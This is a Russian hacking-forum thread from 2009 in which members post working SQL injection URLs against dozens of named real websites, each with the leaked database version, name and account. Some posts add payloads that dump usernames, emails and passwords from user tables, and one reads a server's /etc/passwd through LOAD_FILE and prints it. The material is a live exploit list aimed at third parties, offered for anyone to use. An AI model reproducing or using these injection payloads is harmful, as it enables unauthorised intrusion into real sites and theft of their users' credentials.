ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #8091  
Старый 01.03.2009, 21:07
Аватар для f1ng3r
f1ng3r
Участник форума
Регистрация: 14.01.2009
Сообщений: 257
Провел на форуме:
1936181

Репутация: 688
Отправить сообщение для f1ng3r с помощью ICQ
По умолчанию

Ленинградская торгово-промышленная Палата

Pagerank: 5
тИЦ: 700


Код:
http://www.lotpp.ru/rnews.php?id=-1+union+select+1,concat _ws(0x3a,version(),database(),user()),3,4,5,6,7,8--
Database Version : 4.1.19-log
Database name : lotpp2
User name : lotpp@localhost
 
Ответить с цитированием

  #8092  
Старый 01.03.2009, 21:23
Аватар для Gorev
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

http://www.blacklist-online.ro/?mn=articole&id=-37+union+select+1,2,concat_ws(0x3a,version(),datab ase(),user())


Database Version: 5.0.32-Debian_7etch1~bpo.1-log
Database name: saxas_blacklist
User name: saxas_blacklist@supremecenter52.com
 
Ответить с цитированием

  #8093  
Старый 01.03.2009, 22:17
Аватар для mailbrush
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534

Репутация: 2731


Отправить сообщение для mailbrush с помощью ICQ
По умолчанию

Код:
http://arainia.com/software/gizmo/overview.php?nID=-4+union+select+concat(0x3C68313E,user(),0x3a,database(),0x3a,version(),0x3C2F68313E),2,3--
user:database:version
xawakeningpath@hugo.futurequest.net:xawakeningpath-awaken:5.0.70-log


Код:
http://www.espana.ru/rus/index.php?did=-99999999+union+select+1,2,concat_ws(0x3a,user(),database(),version()),4,5,6,7,8
user:database:version
espana@localhost:espana:4.0.27-log
 
Ответить с цитированием

  #8094  
Старый 01.03.2009, 22:23
Аватар для Gorev
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

http://www.transylvania-jobs.com/?mn=oferta&id=-13+union+select+1,concat_ws(0x3a,version(),databas e(),user()),3,4,5--




Database Version: 5.0.32-Debian_7etch1~bpo.1-log
Database name: saxas_transylvan
User name: saxas_transylvan@supremecenter52.com
 
Ответить с цитированием

  #8095  
Старый 01.03.2009, 23:19
Аватар для f1ng3r
f1ng3r
Участник форума
Регистрация: 14.01.2009
Сообщений: 257
Провел на форуме:
1936181

Репутация: 688
Отправить сообщение для f1ng3r с помощью ICQ
По умолчанию

Pagerank: 3
тИЦ: 1300


Код:
http://www.poezia.ru/newsline2.php?sid=-1+union+select+concat_ ws(0x3a,version(),database(),user()),2,3,4--
Database Version : 5.0.27
Database name : u32983
User name : u32983@localhost


юзвери:

Код:
http://www.poezia.ru/newsline2.php?sid=-1+union+select+concat _ws(0x3a ,uname,pass),2,3,4+from+users+limit+0,1--
 
Ответить с цитированием

  #8096  
Старый 01.03.2009, 23:32
Аватар для mailbrush
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534

Репутация: 2731


Отправить сообщение для mailbrush с помощью ICQ
По умолчанию

Код:
http://www.mingei.org/exhibitions/detail.php?EID=-99999999+union+select+1,2,concat(0x223E,user(),0x3a,database(),0x3a,version(),0x3C212D2D)/*
user():database():version()
mingeior_web@localhost:mingeior_1011:4.1.22-standard
 
Ответить с цитированием

  #8097  
Старый 01.03.2009, 23:34
Аватар для -m0rgan-
-m0rgan-
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
Провел на форуме:
2584134

Репутация: 519


Отправить сообщение для -m0rgan- с помощью ICQ
По умолчанию

Вот небольной сбор багов на конец дня
Налетай

Код:
http://www.v-p-c.fr/article.php?id=-1+union+all+select+0,concat_ws(version(),user(),database()),2,3--
юзер/версия/бд:

Код:
vpc@10.0.70.104.0.25-standard-logvpc :
-------------------------------------------------------------

Код:
http://www.fpt-soft.com/FR/newsDetail.php?id=-1+union+all+select+0,concat_ws(version(),user(),database()),2,3,4,5,6,7,8--
юзер/версия/бд:

Код:
fpt_soft_com@localhost4.1.19-logdb_fpt_soft_com
------------------------------------------------------------

по сути тот же проект, только с другим доменным именем

Код:
http://www.fsoft.com.vn/FR/newsDetail.php?id=-1+union+all+select+0,concat_ws(version(),user(),database()),2,3,4,5,6,7,8--
юзер/версия/бд:

Код:
fpt_soft_com@localhost4.1.19-logdb_fpt_soft_com
-------------------------------------------------------------

Код:
http://www.scenarts.fr/fiche_spectacle.php?id=-1+union+all+select+0,1,concat_ws(version(),user(),database()),3,4--
юзер/версия/бд:

Код:
logscenarts-scenarts@10.0.75.615.0.68
-------------------------------------------------------------

Код:
http://www.rdsm.be/fr/news.php?id=-1+union+all+select+0,concat_ws(version(),user(),database()),2,3--

юзер/версия/бд:

Код:
reyskensp@192.168.0.165.0.77-0.dotdeb.0reyskensp
----------------------------------------------------------------

Код:
http://www.mielapiculteur.fr/faq2.php?id=-1+union+all+select+0,concat_ws(version(),user(),database()),2,3,4,5,6,7,8,9,10--
юзер/версия/бд:


Код:
lunedemiel@localhost4.0.18mielapi
-----------------------------------------------------------------

Код:
http://www.sitetic.fr/prod_detail.php?id=-1+union+all+select+0,concat_ws(version(),user(),database()),2,3,4,5,6,7,8,9,10--

юзер/версия/бд:

Код:
sitetic-web@localhost4.1.22sitetic
----------------------------------------------------------------
The End!
 
Ответить с цитированием

  #8098  
Старый 02.03.2009, 00:12
Аватар для Gorev
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

http://www.ludmilacorlateanu.com/news_details.php?id=-28+union+select+1,2,concat_ws(0x3a,version(),datab ase(),user()),4,5,6,7/*


Database Version: 5.0.32-Debian_7etch1~bpo.1-log
Database name: saxas_lc
User name: saxas_lc@supremecenter52.com
 
Ответить с цитированием

  #8099  
Старый 02.03.2009, 01:14
Аватар для AkyHa_MaTaTa
AkyHa_MaTaTa
Постоянный
Регистрация: 19.03.2007
Сообщений: 684
Провел на форуме:
3152874

Репутация: 1020


Отправить сообщение для AkyHa_MaTaTa с помощью ICQ
По умолчанию

tv.sinn.ru - ВолгаТелеком
PHP код:
http://tv.sinn.ru/view_all_topic.php?m_id=33955+union+select+1,2,concat_ws(0x3A,user(),version(),database()),4,5,6,7+--+ 
tv@localhost
4.0.18-log
tv
 
Ответить с цитированием

  #8100  
Старый 02.03.2009, 01:30
Аватар для f1ng3r
f1ng3r
Участник форума
Регистрация: 14.01.2009
Сообщений: 257
Провел на форуме:
1936181

Репутация: 688
Отправить сообщение для f1ng3r с помощью ICQ
По умолчанию

Pagerank: 5
тИЦ: 700


Код:
http://www.nordicbook.ru/detailed.php?id=-1+union+select+concat_ ws(0x3a,version(),data base(),user()),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--&type=Books
Database Version : 4.1.22
Database name : db_nordic_1
User name : dbu_nordic_1@192.168.8.81


--------------------------------------------#

Pagerank: 4
тИЦ: 275


Код:
http://gamestation.ru/station.php?dir_id=71&prod_id=12476+union+select+1,2,3, concat _ws(0x3a,version(),database(),user()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51--
Database Version : 5.0.67
Database name : Gamestation
User name : root@localhost


юзвери:

Код:
http://gamestation.ru/station.php?dir_id=71&prod_id=12476+union+select+1,2,3,concat_ ws(0x3a,user_id,email,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51+from+ps_users--
читаем /etc/passwd :

Код:
http://gamestation.ru/station.php?dir_id=71&prod_id=12476+union+select+1,2,3,LOAD_FILE(0x2f6574632f706173737764),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,3 9,40,41,42,43, 44,45,46,47,48,49,50,51--
Код:
# $FreeBSD: src/etc/master.passwd,v 1.40 2005/06/06
20:19:56 brooks Exp $ # root:*:0:0:Charlie &:/root:/usr/local/bin/
bash toor:*:0:0:Bourne-again Superuser:/root: daemon:*:1:1:Owner
of many system processes:/root:/usr/sbin/nologin
operator:*:2:5:System &:/:/usr/sbin/nologin bin:*:3:7:Binaries
Commands and Source:/:/usr/sbin/nologin tty:*:4:65533:Tty
Sandbox:/:/usr/sbin/nologin kmem:*:5:65533:KMem Sandbox:/:/
usr/sbin/nologin games:*:7:13:Games pseudo-user:/usr/games:/
usr/sbin/nologin news:*:8:8:News Subsystem:/:/usr/sbin/nologin
man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
smmsp:*:25:25:Sendmail Submission User:/var/spool/
clientmqueue:/usr/sbin/nologin mailnull:*:26:26:Sendmail Default
User:/var/spool/mqueue:/usr/sbin/nologin bind:*:53:53:Bind
Sandbox:/:/usr/sbin/nologin proxy:*:62:62:Packet Filter pseudo-
user:/nonexistent:/usr/sbin/nologin _pflogd:*:64:64:pflogd privsep
user:/var/empty:/usr/sbin/nologin _dhcp:*:65:65:dhcp programs:/
var/empty:/usr/sbin/nologin uucp:*:66:66:UUCP pseudo-user:/var/
spool/uucppublic:/usr/local/libexec/uucp/uucico pop:*:68:6:Post
Office Owner:/nonexistent:/usr/sbin/nologin www:*:80:80:World
Wide Web Owner:/nonexistent:/usr/sbin/nologin
nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/
nologin mysql:*:88:88:MySQL Daemon:/nonexistent:/sbin/nologin
dovecot:*:143:143:Dovecot User:/var/empty:/usr/sbin/nologin
volos:*:1000:0::/home/volos:/usr/local/bin/bash
--------------------------------------------#

Код:
http://alterego.of.by/library/showarticle.php?id=71+union+select+1,concat_ ws(0x3a,version(),d atabase(),user()),3,4,5,6--
Database Version : 4.0.27-log
Database name : alteregotutby
User name : alteregotutby@gemini.tutby.com

Последний раз редактировалось f1ng3r; 02.03.2009 в 10:04.. Причина: add
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ